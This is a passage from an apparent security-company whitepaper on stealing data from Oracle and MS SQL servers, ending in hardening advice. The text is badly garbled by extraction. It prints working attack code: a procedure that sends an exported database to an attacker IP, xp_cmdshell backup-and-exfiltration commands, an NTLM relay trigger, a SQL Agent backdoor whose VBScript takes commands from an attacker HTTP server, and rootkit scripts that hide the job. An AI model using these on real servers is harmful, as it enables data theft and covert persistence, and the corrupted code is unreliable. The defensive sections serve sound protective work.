Fi+* 0in2r:Fi+* G n*- Fi+*&@:Fi+*);
Fi+*In./tStr*2@ in.Str*2@ G n*- Fi+*In./tStr*2@&@:Fi+*);
So,k*t so,k G n*- So,k*t&1ost' .ort);
D2t2O/t./tStr*2@ 3os G n*- D2t2O/t./tStr*2@&so,k$I*tO/t./tStr*2@&));
D2t2In./tStr*2@ 3is G n*- D2t2In./tStr*2@&so,k$I*tIn./tStr*2@&));
-1i+* &&+*nIt1 G in.Str*2@$r*23&0/DD*r)) YG ;6) U
3os$-rit*&0/DD*r' ?' +*nIt1);
3os$D+/s1&);
W

so,k$,+os*&);
in.Str*2@$,+os*&);
W
W;
CREATE OR REPLACE PROCEDURE "PROC_FILESEND" &@:Fi+* <2r,12r2' Hostn2@*2
<2r,12r2' Port PLS_INTEGER)
AS LANGUAGE %AVA
NAME Fi+*S*n3$Di+*S*n3 &C2<2$+2nI$StrinI' C2<2$+2nI$StrinI' int);
D#ecute the ;ava Stored rocedure to send the e#orted file ?e#ort.Fi@ from the database
server to the attac"erOs host ?.>2..3<.25-.. !78 ort KKK5@.
;; !in3o-s
*8*, PROC_FILESEND &,5V*8.ort$Xi.' 6L2$6>7$2MK$6' 444M);
;; =ni8
*8*, PROC_FILESEND &$P30sP*8.ort$Xi.' 6L2$6>7$2MK$6' 444M);
!o receive the comressed file with all the database contents, the attac"er can use the netcat
utility to redirect what is received in a !78 ort to a file. !his can be done with the following
command$
n, ;. 444M ;+ O or2,+*;30$Xi.
M$ $%& $er'er attacks:
'et*s see some attac"s for %S S&' Server.
%tea!ing a com!ete database from &nternet:
Stealing a comlete database is not big deal once you get access to the database server and
you have enough rivileges, you only have to run the ne#t sentences$
--Backup the database
BACKUP DATABASE databasename TO DISK ='c:\!nd"s\temp\"ut#dat'
--C"mp$ess the %!&e '("u d"n't ant a )*b %!&e+
E,EC -p.cmdshe&& 'makecab c:\!nd"s\temp\"ut#dat c:\!nd"s\temp\"ut#cab'
--/et the backup b( c"p(!n* !t t" ("u$ c"mpute$#
E,EC -p.cmdshe&& 'c"p( c:\!nd"s\temp\"ut#cab \\("u$!p\sha$e'
--O$ b( an( "the$ a( 't%tp0 %%tp0 http0 ema!&0 etc#+
--E$ase the %!&es
E,EC -p.cmdshe&& 'de& c:\!nd"s\temp\"ut#dat c:\!nd"s\temp\"ut#cab'
!he revious sentences could be e#ecuted by e#loiting S&' injection in a web alication if
0150 www.argeniss.com
Argeniss – Information Security
the web alication has enough rivileges which is not uncommon, *sa* or other administrative
account are often used by web develoers to connect to %S S&' Server.
Data can be comressed .0$. or more, so .Hb database will be .00%b so it*s not difficult to
steal big amounts of data.
%tea!ing data with a cou!e of c!icks:
!here is this old tool called Data!hief, it*s just a retty basic 8o7 I built on 2002, yes it*s 5
years old, what it*s amaFing is that it still wor"s and that*s the reason why it*s mentioned here,
to show that how a simle and old tool can be easily used to steal data by just oint and clic".
!his tool e#loits S&' Injection and it wor"s even if you can*t get results nor errors bac" on
the web alication. It uses a techniEue that won*t be detailed here but you can loo" at 4K5 for
full details, basically it ma"es attac"ed web alication bac"end S&' Server connect to an
attac"er S&' Server and coy all available data, it uses (en9owset functionality so there is
no need of elevated rivileges, on S&' Server 2000 it*s enabled by default, on S&' Server
2005 it*s not enabled by default but if the functionality has been enabled because secific
needs then it can be abused. In order for this tool to wor" the bac"end S&' Server should be
able to connect to attac"er S&' Server.
!his is a oint and clic" tool very easy to use that unfortunately has been used by bad guys to
steal data, that*s the reason why it was ta"en off line some time ago.
!o use the tool you first need to have your own ?or not@ %S S&' Server where the tool will
coy the available data, you have to setu the connection arameters at the very to of the
tool, then you need to find a S&' injection entry oint in a web alication and set the L9'
and arameters adding XVVVM where S&' statements will be automatically injected to, also
you have to set the =!!8 method used to send the data to web alication, after that you only
need to start ma"ing clic" and you will get all the data available.
0160 www.argeniss.com
Argeniss – Information Security
!his tool is available together with this aer and it has a hel document that give more
details on how to use it.
%tea!ing %,+ %erver account credentia!s and use them to connect back
to %,+ %erver:
As you may "now %S S&' Server suorts )indows I!'% authentication, I!'% authentication
and I!'% wea"nesses won*t be detailed here you can loo" at 455 for details. !he I!'%
challenge resonse mechanism is vulnerable to %I!% attac"s because by default all )indows
versions use a wea" configuration, so we can e#loit this to launch an attac" that will allow us
to connect to %S S&' Server as the user account under the S&' Server service is running
which always is an administrative account, logically this attac" won*t wor" if S&' Server is
running under 'ocalSystem account because it can*t authenticate to remote systems, but don*t
worry because running S&' Server under 'ocalSystem account is not a good security ractice
and it is not recommended by %icrosoft.
)e can force S&' Server connect to us ?the attac"er@ and try to authenticate ?#Qfilee#ist can
be e#ecuted by any database user@$
e-ec maste$#db"#-p.%!&ee-!st '\\Ou$IP\sha$e'
!hat sentence will cause S&' Server to try to authenticate to the remote comuter as its
service account which has sysadmin database rivileges.
,y using this I!'% %I!% attac", we can use S&' Server credentials to connect bac" to S&'
Server as sysadmin and own the database server ?and then own the )indows server of course
but that*s another toic@
0170 www.argeniss.com
Argeniss – Information Security
!he ne#t is a basic I!%' authentication schema$
7lient connects Server → →
7lient sends challenge Server ← ←
7lient sends resonse Server → →
7lient authenticates Server ← ←
!he ne#t reresents a simle S&' Server I!'% authentication %I!% attac"$
?Attac"er@ ?S&' Server@
a@ 7lient connects → Server →
b@ 7lient sends challenge ?c@ Server ← ←
.@ 7lient forces to connect Server → →
2@ 7lient connects Server ← ←
-@ 7lient sends challenge → ?c@ Server →
K@ 7lient sends resonse ?r@ Server ← ←
c@ 7lient sends resonse → ?r@ Server →
d@ 7lient authenticates Server ← ←
'et*s detail a bit this attac" in a simle way, first the client ?attac"er@ will try to connect and
authenticate to the server ?S&' Server@ using I!'% authentication, the server will send a
challenge ?c@ to the client, the client must use that challenge and send the roer resonse in
order to successfully login, but instead of doing that the client holds on this authentication and
it forces the server to connect to the client so the server will try to authenticate to the client
?the client must be reviously logged to S&' Server under a low rivileged account, e#loiting
S&' injection could wor" too on some circumstances without the need to authenticate to S&'
Server@ so client will send the same challenge ?c@ that it reviously got from the server, the
server will sent a resonse ?r@ to the client, finally the client will use that resonse ?r@ to send
it to the server on the authentication that was hold on and the client will successfully
authenticate in the server as the server service account, a database administrator account.
!his attac" is imlemented by our %aguro tool ?by ;8@ available together with this aer,
which consists on a coule of ython scrits, currently this tool only wor"s with )indows 2000,
we are still wor"ing to suort )indows 200-.
D#tracts from %AHL9(09DAD%D.t#t$
...
%aguro tunnels an !DS1S&' connection to a target S&' server for a non rivileged user.
!he tunnel juggles with the I!'%SS8 ac"ets contained in the !DS1S&' connection, and
escalates rivileges to the ones of the account the S&' server is running as ?it won*t wor" if
S&' Server is running under 'ocal System account@, using the already well "nown and
documented %I!% attac" to I!'% authentication which has e#isted for several years now ?first
detailed information I remember comes from smbrelay*s author, Sir Dystic of 7L'! (C !=D
DDAD 7() 405@.
0180 www.argeniss.com
Argeniss – Information Security
!o do so, it forces the target S&' server to connect and authenticate itself to the attac"er*s
machine.
...
%tea!ing data using a rootkit and backdoor:
After comromising a S&' Server is always nice to have a way to continue having access and
not being detected so you can continue stealing data forever.
)e can insert a bac"door in S&' Server by creating a ;ob and scheduling it to connect to us at
any given time, allowing us to e#ecute any command and get the results bac", the ;ob
e#ecutes N,Scrit code that connects to attac"er using =!!8 ?=!!8S could be used to byass
IDS@. Attac"er uses Ietcat and send commands on Date =!!8 header.
'et*s see the code$
,DHII !9AISA7!I(I
DD7'A9D Y9eturn7ode II!
SD'D7! Y9eturn7ode Z 0
IC I(! DGIS!S ?SD'D7! name C9(% msdb.dbo.syscategories )=D9D nameZI*4LncategoriFed
?'ocal@5* AID categoryQclassZ.@
,DHII
DGD7 Y9eturn7ode Z msdb.dbo.sQaddQcategory YclassZI*;(,*, YtyeZI*'(7A'*,
YnameZI*4LncategoriFed ?'ocal@5*
IC ?YYD99(9 XM 0 (9 Y9eturn7ode XM 0@ H(!( &uit)ith9ollbac"
DID
DD7'A9D YjobId ,IIA9A?.3@
00here the ;ob named bac"D00r is added
DGD7 Y9eturn7ode Z msdb.dbo.sQaddQjob YjobQnameZI*bac"D00r*,
YenabledZ.,
YnotifyQlevelQeventlogZ0,
YnotifyQlevelQemailZ0,
YnotifyQlevelQnetsendZ0,
YnotifyQlevelQageZ0,
YdeleteQlevelZ0,
YdescritionZI*Io descrition available.*,
YcategoryQnameZI*4LncategoriFed ?'ocal@5*,
YownerQloginQnameZI**, YjobQid Z YjobId (L!8L!
IC ?YYD99(9 XM 0 (9 Y9eturn7ode XM 0@ H(!( &uit)ith9ollbac"
00here we schedule the ;ob to run when we want
DGD7 msdb.dbo.sQaddQjobschedule YjobQidZYjobId, YnameZI*.*,
YenabledZ.,
YfreEQtyeZK,
YfreEQintervalZ.,
YfreEQsubdayQtyeZ.,
YfreEQsubdayQintervalZ0,
YfreEQrelativeQintervalZ0,
YfreEQrecurrenceQfactorZ.,
YactiveQstartQdateZ0, 00 date when the job will run yyyymmdd format
YactiveQendQdateZ>>>>.2-.,
0190 www.argeniss.com
Argeniss – Information Security
YactiveQstartQtimeZ>5K00, 00 time when the job will run hhmmss format
YactiveQendQtimeZ2-5>5>
00 here we add a ;ob ste with the vbscrit code
DGD7 Y9eturn7ode Z msdb.dbo.sQaddQjobste YjobQidZYjobId, YsteQnameZI*.*,
YsteQidZ.,
Ycmde#ecQsuccessQcodeZ0,
YonQsuccessQactionZ.,
YonQsuccessQsteQidZ0,
YonQfailQactionZ2,
YonQfailQsteQidZ0,
YretryQattemtsZ0,
YretryQintervalZ0,
YosQrunQriorityZ0, YsubsystemZI*ActiveScriting*,
YcommandZI*ort Z <0
httserver Z [htt$11.>2..3<....5[ **change for attac"er i, using htts will byass IDS
sElserver Z [.[ **change for server instance name if it is a named instance
command Z [[
on error resume ne#t
set rds Z createobject?[rds.datasace[@ **some tric" to be able to use G%'=!!8 $@
Set htt Z rds.7reate(bject?[%s#ml2.G%'=!!8[,[[@
if not 7hec"Drror then
do while ucase?trim?command@@XM[DGI![
htt.oen [=DAD[, httserver \ [$[ \ ort, CA'SD
htt.send outte#t \ vbcrlf \ vbcrlf
outte#tZ[[
if not 7hec"Drror then
commandZ htt.get9esonse=eader?[Date[@
if ucase?trim?command@@XM[DGI![ then
Set 7onn Z 7reate(bject?[AD(D,.7onnection[@
Set 9ec Z 7reate(bject?[AD(D,.9ecordset[@
if not 7hec"Drror then
conn.oen [roviderZsEloledbTserverZ[ \ sElserver \ [TtrustedQconnectionZyesT[
rec.oen command, conn
if not 7hec"Drror then
for iZ0 to rec.fields.count 0.
if outte#tXM[[ then outte#tZ outte#t \ vbtab
outte#tZ outte#t \ [email protected]
ne#t
outte#tZ outte#t \ vbcrlf \ rec.getstring?,,vbtab,vbcrlf,[[@
if 7hec"Drror then outte#tZ err.descrition
else
outte#tZ err.descrition
end if
else
outte#tZ err.descrition
0200 www.argeniss.com
Argeniss – Information Security
end if
end if
end if
loo
end if
set connZnothing
set recZnothing
set httZnothing
set testZnothing
function 7hec"Drror
if errZ0 then
7hec"DrrorZCalse
else
7hec"DrrorZ!rue
errZ0
end if
end function
*,
YdatabaseQnameZI*N,Scrit*, YflagsZ0
IC ?YYD99(9 XM 0 (9 Y9eturn7ode XM 0@ H(!( &uit)ith9ollbac"
DGD7 Y9eturn7ode Z msdb.dbo.sQudateQjob YjobQid Z YjobId, YstartQsteQid Z .
IC ?YYD99(9 XM 0 (9 Y9eturn7ode XM 0@ H(!( &uit)ith9ollbac"
DGD7 Y9eturn7ode Z msdb.dbo.sQaddQjobserver YjobQid Z YjobId, YserverQname Z
I*?local@*
IC ?YYD99(9 XM 0 (9 Y9eturn7ode XM 0@ H(!( &uit)ith9ollbac"
7(%%I! !9AISA7!I(I
H(!( DndSave
&uit)ith9ollbac"$
IC ?YY!9AI7(LI! M 0@ 9('',A7R !9AISA7!I(I
DndSave$
!he above code will first create a ;ob, then it will schedule the ;ob to run whenever you want,
finally it will add a ;ob ste with the vbscrit that will connect to attac"er over =!!8 and read a
command from Date =!!8 header and return resonses bac" and so on until [e#it[ command
is read.
If you want run the ;ob just after you create it you can e#ecute the ne#t$
DGD7 msdb.dbo.sQstartQjob YjobQnameZI*bac"D00r*
Nery nice, isn*t itJ
!hat*s not all, we need to hide what we just added so database administrators won*t notice a
new ;ob has been created nor when it*s running. )e can do this with a database root"it, S&'
Server tools Euery system views to get information about the database objects in order to
dislay them, we can modify these views so the objects we added are not returned by the
Eueries nor dislayed.
!he ne#t !S&' code must be run in order to install the root"it$
0000000000000000000000000000000000000000000000000000000000000000000000
00
00 Scrit for S&' Server 2005 to install root"it to hide bac"door
00 running as a job, adding [?jobs.nameXM*bac"D00r*@ AID[ in where clause
0210 www.argeniss.com
Argeniss – Information Security
00
0000000000000000000000000000000000000000000000000000000000000000000000
use msdbT
e#ec sQe#ecutesEl I*
A'!D9 NID) sysjobsQview
AS
SD'D7! jobs.jobQid,
svr.originatingQserver,
jobs.name,
jobs.enabled,
jobs.descrition,
jobs.startQsteQid,
jobs.categoryQid,
jobs.ownerQsid,
jobs.notifyQlevelQeventlog,
jobs.notifyQlevelQemail,
jobs.notifyQlevelQnetsend,
jobs.notifyQlevelQage,
jobs.notifyQemailQoeratorQid,
jobs.notifyQnetsendQoeratorQid,
jobs.notifyQageQoeratorQid,
jobs.deleteQlevel,
jobs.dateQcreated,
jobs.dateQmodified,
jobs.versionQnumber,
jobs.originatingQserverQid,
svr.masterQserver
C9(% msdb.dbo.sysjobs as jobs
;(II msdb.dbo.sysoriginatingserversQview as svr
(I jobs.originatingQserverQid Z svr.originatingQserverQid
00'DC! ;(II msdb.dbo.sysjobservers js (I jobs.jobQid Z js.jobQid
)=D9D ?jobs.nameXM**bac"D00r**@ AID ? ?ownerQsid Z SLSD9QSID?@@
(9 ?ISIL''?ISQS9N9('D%D%,D9?I**sysadmin**@, 0@ Z .@
(9 ?ISIL''?ISQ%D%,D9?I**S&'Agent9eader9ole**@, 0@ Z .@
(9 ? ?ISIL''?ISQ%D%,D9?I**!argetServers9ole**@, 0@ Z .@ AID
?DGIS!S?SD'D7! V C9(% msdb.dbo.sysjobservers js
)=D9D js.serverQid XM 0 AID js.jobQid Z jobs.jobQid@@@@ 00 filter out local jobs*
0000000000000000000000000000000000000000000000000000000000000000000000
00
00 Scrit for S&' Server 2005 to install root"it to hide schedule
00 for the bac"door job, adding [AID sched.nameXM*.*[ in where clause
00
0000000000000000000000000000000000000000000000000000000000000000000000
use msdbT
e#ec sQe#ecutesEl I*
A'!D9 NID) sysschedulesQlocalserverQview
AS
SD'D7! sched.scheduleQid,
sched.scheduleQuid,
sched.originatingQserverQid,
sched.name,
sched.ownerQsid,
sched.enabled,
sched.freEQtye,
0220 www.argeniss.com
Argeniss – Information Security
sched.freEQinterval,
sched.freEQsubdayQtye,
sched.freEQsubdayQinterval,
sched.freEQrelativeQinterval,
sched.freEQrecurrenceQfactor,
sched.activeQstartQdate,
sched.activeQendQdate,
sched.activeQstartQtime,
sched.activeQendQtime,
sched.dateQcreated,
sched.dateQmodified,
sched.versionQnumber,
svr.originatingQserver,
svr.masterQserver
C9(% msdb.dbo.sysschedules as sched
;(II msdb.dbo.sysoriginatingserversQview as svr
(I sched.originatingQserverQid Z svr.originatingQserverQid
)=D9D ?svr.masterQserver Z 0@ AID sched.nameXM**.**
AID ? ?sched.ownerQsid Z SLSD9QSID?@@
(9 ?ISIL''?ISQS9N9('D%D%,D9?I**sysadmin**@, 0@ Z .@
(9 ?ISIL''?ISQ%D%,D9?I**S&'Agent9eader9ole**@, 0@ Z .@
@*
After running running the above code the ;ob we reviously created will be hided from %S S&'
Server tools. )e will continue having access without being noticed by database administrators.
After we have done all we want with the database server or if we are tired of owning the
server we can remove the root"it with the ne#t !S&' code$
0000000000000000000000000000000000000000000000000000000000000000000000
00
00 Scrit for S&' Server 2005 to uninstall root"it that hides bac"door
00 running as a job, removing [?jobs.nameXM*bac"D00r*@ AID[ in where clause
00
0000000000000000000000000000000000000000000000000000000000000000000000
use msdbT
e#ec sQe#ecutesEl I*
A'!D9 NID) sysjobsQview
AS
SD'D7! jobs.jobQid,
svr.originatingQserver,
jobs.name,
jobs.enabled,
jobs.descrition,
jobs.startQsteQid,
jobs.categoryQid,
jobs.ownerQsid,
jobs.notifyQlevelQeventlog,
jobs.notifyQlevelQemail,
jobs.notifyQlevelQnetsend,
jobs.notifyQlevelQage,
jobs.notifyQemailQoeratorQid,
jobs.notifyQnetsendQoeratorQid,
jobs.notifyQageQoeratorQid,
jobs.deleteQlevel,
jobs.dateQcreated,
0230 www.argeniss.com
Argeniss – Information Security
jobs.dateQmodified,
jobs.versionQnumber,
jobs.originatingQserverQid,
svr.masterQserver
C9(% msdb.dbo.sysjobs as jobs
;(II msdb.dbo.sysoriginatingserversQview as svr
(I jobs.originatingQserverQid Z svr.originatingQserverQid
00'DC! ;(II msdb.dbo.sysjobservers js (I jobs.jobQid Z js.jobQid
)=D9D ?ownerQsid Z SLSD9QSID?@@
(9 ?ISIL''?ISQS9N9('D%D%,D9?I**sysadmin**@, 0@ Z .@
(9 ?ISIL''?ISQ%D%,D9?I**S&'Agent9eader9ole**@, 0@ Z .@
(9 ? ?ISIL''?ISQ%D%,D9?I**!argetServers9ole**@, 0@ Z .@ AID
?DGIS!S?SD'D7! V C9(% msdb.dbo.sysjobservers js
)=D9D js.serverQid XM 0 AID js.jobQid Z jobs.jobQid@@@ 00 filter out local jobs*
0000000000000000000000000000000000000000000000000000000000000000000000
00
00 Scrit for S&' Server 2005 to uninstall root"it that hides schedule
00 for the bac"door job, removing [AID sched.nameXM*.*[ in where clause
00
0000000000000000000000000000000000000000000000000000000000000000000000
use msdbT
e#ec sQe#ecutesEl I*
A'!D9 NID) sysschedulesQlocalserverQview
AS
SD'D7! sched.scheduleQid,
sched.scheduleQuid,
sched.originatingQserverQid,
sched.name,
sched.ownerQsid,
sched.enabled,
sched.freEQtye,
sched.freEQinterval,
sched.freEQsubdayQtye,
sched.freEQsubdayQinterval,
sched.freEQrelativeQinterval,
sched.freEQrecurrenceQfactor,
sched.activeQstartQdate,
sched.activeQendQdate,
sched.activeQstartQtime,
sched.activeQendQtime,
sched.dateQcreated,
sched.dateQmodified,
sched.versionQnumber,
svr.originatingQserver,
svr.masterQserver
C9(% msdb.dbo.sysschedules as sched
;(II msdb.dbo.sysoriginatingserversQview as svr
(I sched.originatingQserverQid Z svr.originatingQserverQid
)=D9D ?svr.masterQserver Z 0@
AID ? ?sched.ownerQsid Z SLSD9QSID?@@
(9 ?ISIL''?ISQS9N9('D%D%,D9?I**sysadmin**@, 0@ Z .@
(9 ?ISIL''?ISQ%D%,D9?I**S&'Agent9eader9ole**@, 0@ Z .@
@*
0240 www.argeniss.com
Argeniss – Information Security
After removing the root"it we can remove the bac"door$
0000000000000000000000000000000000000000000000000000000000000000000000
00
00 Scrit for S&' Server 2005 to uninstall bac"door
00
0000000000000000000000000000000000000000000000000000000000000000000000
DD7'A9D YjobId ,IIA9A?.3@
select YjobIdZjobQid C9(% msdb.dbo.sysjobs where nameZ*bac"D00r*
DGD7 msdb.dbo.sQdeleteQjob YjobQidZYjobId, YdeleteQunusedQscheduleZ.
After removing the root"it and bac"door the database server will continue running without
roblems. Instead of removing the root"it and bac"door you can just disable the job schedule
and enable it when you need it because you don*t have to worry about the bac"door being
detected unless some smart database administrators read the ne#t $@
!o detect if this root"it is installed it*s just easy as directly Euerying msdb.dbo.sysjobs and
msdb.dbo.sysschedules tables and comaring the results with the ones dislayed by %S S&'
Server tools.
)e have seen some retty cool attac"s, we are constantly researching and finding new attac"s
and vulnerabilities on database servers, for more e#loits, advisories, research aers, etc.
related for database security you can loo" at 435 .
How to (rotect against attacks:
'et*s see now how you can rotect your databases against attac"s.
%et a good assword o!ic6:
Lse strong asswords, educate users to use ass hrases, they are easy to remember and
hard to crac". Imlement a olicy where assword reuse is not allowed, login loc"down after #
failed logins attemts, asswords must be changed every # days, etc.
7ee u to date with securit6 atches:
!ry to install atches as fast as you can, database vulnerabilities are serious, sometimes your
database server can be easily comromised with a simle Euery.
Always test atches for some time on non roduction servers first and monitor for atch
roblems on mailing lists. Sometimes atches could oen holes ?hello %r (racle@ instead of
fi#ing them.
Protect database server b6 firewa!!:
Allow connections only from trusted hosts. ,loc" all non used orts and bloc" all outbound
connections, why the database server would need to connect to a host or InternetJ, you can
set e#cetions for relication, lin"ed databases, etc.
"isab!e a!! non used functiona!it6:
Some database servers have all functionality enabled by default, you can use hardening guides
from trusted arties to disable non used functionality, remember to test on non roduction
servers first.
2se encr6tion:
0250 www.argeniss.com
Argeniss – Information Security
At networ" level$ use SS', database rorietary rotocols.
At file level$ Cile and Cile System encrytion ?bac"us, data files, etc.@
At database level$ column encrytion ?databases encrytion A8Is, !hird arty solutions@
Periodica!!6 check for ob$ect and s6stem ermissions:
7hec" views, stored rocedures, tables, etc. ermissions. 7hec" file, folder, registry, etc.
ermissions. 7hanges on ermissions could mean a comromise or mis0configuration.
Periodica!!6 check for new database insta!!ations:
!hird arty roducts can install database servers and this new installed servers could be
installed with blan" or wea" asswords, un0atched, mis0configured, etc. Detect new database
installations and secure or remove them.
Periodica!!6 check for users with database administration rivi!eges:
!his hels to detect intrusions, elevation of rivileges, etc.
Periodica!!6 check for database configuration and settings:
If security configurations or settings are changed for instance by a system ugrade, atch, etc.
your databases could be oen to attac". If they change and there wasn*t system ugrade then
it could mean a comromise.
Periodica!!6 check database s6stem ob$ects against changes:
If you detect a change in a system object and you haven*t alied a fi# or ugrade to your
database server it could mean that a root"it is resent.
Periodica!!6 audit 6our web a!ications:
Audit your web alications for S&' injection, mis0configurations. )ea" ermissions, etc. Also
remember to use low rivileged users to connect to database servers, If vulnerable to S&'
Injection, attac"s could be limited.
(un database services under !ow rivi!eged accounts:
If database services are comromised then (S comromise could be a bit difficult.
+og as much as ossib!e:
8eriodically chec" logs for events such as$
● Cailed logins.
● Incorrect S&' synta#.
● 8ermissions errors.
● Dtc.
!he resence of those events could mean your database was or it*s being attac"ed.
/onitor user activities and accesses:
If users "now that they are not monitored, they could feel free to hac" database servers and
not be caught.
)ui!d a database server hone6ot:
,y using a database server honeyot you can detect database attac"s in your organiFation at
an early stage, it will hel you to detect and revent internal and e#ternal attac"s, usually
attac"ers will go first for the low hanging fruit. In order to set u a database honeyot you can
follow the ne#t stes$
● Isolate the server
 All outbound connections should be bloc"ed.
● Set it to log everything, run traces and set alerts.
● Set u other services to create a realistic environment.
● Set blan" or easily guessable asswords.
0260 www.argeniss.com
Argeniss – Information Security
● %a"e the server loo"s interesting
 Aou can lin" it from roduction servers.
 Set it an interesting name li"e 7redit7ardServer, CinancialServer, etc.
 7reate databases with names li"e 7redit7ards, 7ustomersInfo, etc.
 7reate tables with fa"e data that seems real.
)ui!d a home made &"%/&P%:
(n sensitive Database Servers deending on available functionality you can build a simle
IDS1I8S by setting database alerts to get notifications or to erform some actions when some
errors occur$
● Cailed login attemts.
● Incorrect S&' synta#.
● LII(I statement errors.
● 8ermissions errors.
Protect 6our data as 6ou rotect 6our mone68888888:
,e smart, thin" about it, if you lose data you lose money.
2se third art6 too!s:
If your comany has few database servers then it*s not big deal to manually audit them, build
some basic tools, etc. but when you have doFens of databases servers it*s get comlicated so
it*s recommended that you use third arty tools for$
● Dncrytion.
● Nulnerability assessment.
● Auditing.
● %onitoring, Intrusion revention, etc.
#rain &# staff on database securit6:
If your staff doesn*t "now what database security is then all the tools and best rotection in
the world won*t hel you much. Staff must be trained and learn in order to get database
security.
.sk for secia!i5ed rofessiona! services:
Security comanies secialiFed in database security with a robed trac" record on database
research are far better that all urose security comanies.
0270 www.argeniss.com
Argeniss – Information Security
Conc!usion:
As we just saw data theft threat is real, stealing data is retty simle if you "now how to do it
and the bad guys are learning fast, they are investing and building attac" tools while
comanies seem to be sleeing and giving away for free their data. (ne simle mista"e can
lead to database comromise. If you don*t rotect your databases sooner or later you will get
hac"ed, this means lot of money loses and in worst case running out of business. 8erimeter
defense is not enough, you must rotect your databases doing strong investments on database
rotection.
$(a#:
If you need information security services don*t do as (racle, contact us.
Don*t be li"e (racle, hac" your own servers before someone else does it6,
chec" out Argeniss Lltimate 0day D#loits 8ac"
htt$11www.argeniss.com1roducts.html
0280 www.argeniss.com
Argeniss – Information Security
)eferences:
4.5 !he high cost of data loss
htt$11www.informationwee".com1security1showArticle.jhtmlJarticleIDZ.<-P00-3P\gnoZ.
425 8rivacy 9ights 7learinghouse
htt$11www.rivacyrights.org1
4-5 =ow much are your ersonal details worthJ
htt$11www.turbulence.org1)or"s1swie1calculator.html
htt$11www.ban"rate.com1brm1news1f12003022.b..as
4K5 %aniulating %S S&' Server using S&' Injection
htt$11www.asecinc.com1resentations1%aniulatingQS&'QServerQLsingQS&'QInjection.df
455 I!'% stuff
htt$11www.isecartners.com1documents1I!'%QLnsafe.df
htt$11davenort.sourceforge.net1ntlm.html
435 8aers, advisories and e#loits
htt$11www.argeniss.com1research.html
4P5 (racle 9oot"its 2.0
htt$11www.red0database0security.com1w1oracleQroot"itsQ2.0.df
4<5 %ultile S&' Injection vulnerabilities in D,%SQ%D!ADA!A ac"age
htt$11www.asecinc.com1resources1alerts1oracle1200500-.html
4>5 D,%SQ%D!ADA!A D#loit
htt$11www.argeniss.com1research1(raD,%SQ%D!ADA!AD#loit.t#t
0290 www.argeniss.com
Argeniss – Information Security
About Argeniss
Argeniss is an information security comany secialiFed on alication and database security,
we offer services such as vulnerability information, e#loit develoment, software auditing,
enetration testing and training, also we offer e#loits for widely deloyed software.
7ontact us

,uenos Aires K3-
8arana, Dntre 9ios
Argentina
D0mail$ infoM.at.XargenissM.dot.Xcom
!el$ S5K0-K-0K2-.0P3
Ca#$ .0<0.0K5K53.K
0300 www.argeniss.com